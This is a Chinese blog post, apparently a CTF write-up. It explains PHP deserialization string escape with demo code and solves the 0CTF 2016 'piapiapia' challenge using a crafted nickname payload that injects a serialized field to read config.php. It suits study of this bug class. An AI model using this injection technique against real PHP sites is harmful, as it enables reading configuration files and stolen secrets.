[0CTF 2016]piapiapia & php反序列化字符串逃逸

最新推荐文章于 2023-10-08 11:05:09 发布
最新推荐文章于 2023-10-08 11:05:09 发布
阅读量541 收藏
点赞数
分类专栏: 渗透笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40519543/article/details/107242836
版权

一、php反序列化字符串逃逸

 

<?php

class user{
    public $user = 'admin';
    public $pass = 'passwd';
}


$a = new user();
$b = serialize($a);

echo $b."<br>";


$c = unserialize($b);

echo $c->pass;



?>

 

运行结果:

序列化后的字符串应该能看出来,大括号外面有类名及长度,括号里面以分号划分多个变量,包含其变量名及长度,变量值及长度。

这些都是对应好的,而如果我们对比如user的值进行修改,改为admin1,而长度不变,当反序列化时就会报错。

<?php

    $a = 'O:4:"user":2:{s:4:"user";s:5:"admin1";s:4:"pass";s:6:"passwd";}';
    $b = unserialize($a);
    echo $b->pass;

?>

 

我理解的是unserilize()函数是从左往右读入,当读入s:5:时,系统就知道后面引号内是字符串且长度为5,于是从双引号开始读入长度为5的字符,但由于admin1是6个字符,导致后面第6个字符该是双引号来结束,却没有,由此产生异常。而如果我们设置的payload则可以越过这个异常。

 

<?php

function filter($str){
    $str = str_replace("ab","ccc",$str);
    return $str;
}
class user{
    public $user = 'ababababababababababababababababababababababababab";s:4:"pass";s:4:"hack";}';
    public $pass = 'passwd';
}


$a = new user();
echo serialize($a)."<br>";

$b = filter(serialize($a));

echo $b."<br>";

$c = unserialize($b);

echo $c->pass;



?>

 

其中,user的值有25个ab,经序列化后又对其进行替换,每替换一个ab,就多一个字符,这样就可能会导致前面所说的系统知道的长度和实际长度不对应,就会报错,但后面的payload=";s:4:"pass";s:4:"hack";},这样就拼接起来,具体来说

初始序列化后为

O:4:"user":2:{s:4:"user";s:75:"ababababababababababababababababababababababababab";s:4:"pass";s:4:"hack";}";s:4:"pass";s:6:"passwd";}

 

可见长度为75,payload长度是为25,所以这里使用了25个ab,当替换后就多出25个字符。待替换后就为:

O:4:"user":2:{s:4:"user";s:75:"ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc";s:4:"pass";s:4:"hack";}";s:4:"pass";s:6:"passwd";}

你可以知道,c的个数刚好为75个,而系统读入了75个字符想碰到双引号也成功,之后就会继续反序列化我们的payload,而在大括号之后的字符都会被挤进下一个参数中。

 

二、piapiapia

这题打开后测试过不是sql注入后,就用御剑去扫,发现扫不来什么,于是我去下了个大字典,去扫,扫到一半御剑就崩了,,,于是我去实验dirsearch以及dirmap,能扫出www.zip文件,打开后经审计,知道profile.php文件中有一个unserialize函数,而在反序列化之前,有对内部参数进行替换,也正因此我们才有字符串逃逸。同时他反序列化后对photo使用了文件读取函数,在config.php中有flag,那么我们就读取这个文件。

hacker是6个字符而where是5个字符,另外nickname长度要小于10,需要用数组来绕过。于是可以构造payload:

wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere";}s:5:"photo";s:10:"config.php";}

 

这里要注意的是,nickname是一个数组,所以在";}s:5:这里面要加个大括号,

最后,对图片base64解密即可

 

 

 

为之。
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
[0CTF 2016]piapiapia(反序列化逃逸
paidx0
09-02 718
偷了三天懒没有学习,哈哈哈,通宵看完了扫黑风暴 开始做题 打开环境,第一时间以为是SQL注入,用sqlmap跑了一下,并不是 找了一下也没有什么东西,就去扫一下他的敏感目录,扫到www.zip,下载下来 先用Seay快速审计一下,再去细看代码逻辑 知识点 1、代码审计 2、反序列化逃逸 来一起看看代码吧 先看看可能存在文件读取的profile.php 首先想到的就是利用反序列化,然后文件读取,继续跟进 $profile = $user->show_profile($username); 再看in
[0CTF 2016]piapiapia(字符逃逸详解)
记录学习,一起进步
02-01 857
[0CTF 2016]piapiapia
[0CTF 2016]piapiapia
m0_62879498的博客
05-14 391
[0CTF 2016]piapiapia 进入环境,发现了登录页面 以为是注入类题目(主要是sql注入),一番尝试后却没有发现注入点 尝试使用 dirsearch 扫描目录 看看能有什么发现 发现了 网页源代码 www.zip 以及一系列php文件 访问 register.php 注册用户 注册登陆后 进入就是 update.php 文件 ,进行用户信息收集 提交信息后没有发现什么信息 下载网站源代码,进行代码审计 index.php和register.php 没有什么值得注意的地方 我们重点关
浅析php反序列化字符串逃逸
Lemon's blog
08-26 3050
前言: php反序列化字符串逃逸之前没有详细的学习过,所以遇到题目看的有点懵,这次好好学习一下。 反序列化的特点 首先要了解一下反序列化的一些特点: php反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾,并且是根据长度判断内容的 ,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。 class A{ public $name='shy'; public $pass='123456'; } $lemon = new A(); echo serialize
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
PHP反序列化长度变化尾部字符串逃逸】是一种安全漏洞利用技术,通常出现在使用PHP的系统中。在PHP中,对象序列化是将对象转换为可存储或传输的字符串的过程,而反序列化则是将这个字符串恢复为原始对象的过程。...
PHP反序列化漏洞详解.rar
02-07
在IT安全领域,PHP反序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞。 反序列化漏洞通常出现在程序中,当接收到从网络或持久存储中读取的数据,并将其转换回原来的对象实例时...
从一道CTF题学习PHP反序列化漏洞-附件资源
03-02
从一道CTF题学习PHP反序列化漏洞-附件资源
[0CTF 2016]piapiapia(反序列化逃逸)
羽的博客
03-01 3138
通过扫描后台目录获得了源码(www.zip)。解压出来发现出了登录之外还有注册和其他的目录。在config.php中发现了flag变量,看来题目目的是让我们读取config.php了。 我们来看下每个页面: 1 index.php,register.php: 这两个个是登录页面和注册页面,要求我们输入的用户名和密码的长度都在3-16内。 2 class.php: 在class.php中我们发现了过...
php引用(&)详解及注意事项
weixin_33978044的博客
09-10 261
摘自:PHP引用(&amp;)使用详解   官方文档: 1.引用是什么:http://www.php.net/manual/zh/language.references.whatare.php 2.引用做什么:http://www.php.net/manual/zh/language.references.whatdo.php 3.引用传递:http://www...
php中的变量和函数名前加&符号的意思
iteye_105的博客
01-20 124
  在PHP中&amp;符号即传的是变量的引用而不是拷贝,引用意味着用不同的名字访问同一个变量内容。 这并不像 C 的指针,它们是符号表别名。注意在 PHP 中,变量名和变量内容是不一样的,因此同样的内容可以有不同的名字。最接近的比喻是 Unix 的文件名和文件本身 - 变量名是目录条目...
[0CTF 2016]piapiapia总结(PHP序列化长度变化导致尾部字符逃逸
qq_44657899的博客
04-30 1571
这道题感觉很难,要是比赛中出这种题我肯定做不来,所以我耐着性子慢慢分析这道题,最后居然自己做了个七七八八,只剩下一点点就完全做出来了。 下面把我做这道题时的思路一步一步记录下来,希望能够彻底巩固。 一,信息收集 拿到题没有什么思路,先找找线索,从源码和题目里没看到什么提示。 试了试万能密码登录也无果,然后试着扫目录和用burp抓包找提示。 发现有www.zip源码泄露。 二,分析源码 对于代码审...
PHP反序列化字符串逃逸
Aiwin的博客
01-10 892
PHP反序列化字符串逃逸
[UUCTF 2022 新生赛]ezpop - 反序列化(字符串逃逸)【***】
最新发布
oZuoShen123的博客
10-08 442
起点:UUCTF(__construct) 终点:youwant(rce) 链条:UUCTF(key='UUCTF';basedata=反序列化数据)-> nothing(a=&$n->b;t=$o)-> output(a=$y)-> youwant(cmd=命令) 注意点:1、UUCTF的basedata用来存放反序列化数据     2、参数是data,通过post传参     3、post的参数,需要通过字符串逃逸 针对此类题目,由于特点是把我们的序列化数据再次序列化……
[0CTF 2016]piapiapia 详细解题思路及做法
EC_Carrot的博客
12-09 1259
前言 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! 题目 进去是一个登陆界面,尝试sql注入,发现没什么用,但又没有其他功能了,只能扫描看看有没有源码泄露 这边用的是dirsearch,可以扫描出www.zip文件,但在BUUCTF里面做题需要设置延迟参数-x,不然扫描太快就全是返回429状态码。 在www.zip提供的源码里面主要有: index.php、profile.php、register.p
PHP反序列化漏洞 ctfhub
07-28
PHP反序列化漏洞是一种常见的Web应用程序漏洞,它允许攻击者通过操纵序列化和反序列化过程来执行恶意代码。这种漏洞通常出现在PHP应用程序中,特别是在使用不安全的反序列化函数(如`unserialize()`)时。 CTFHub是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值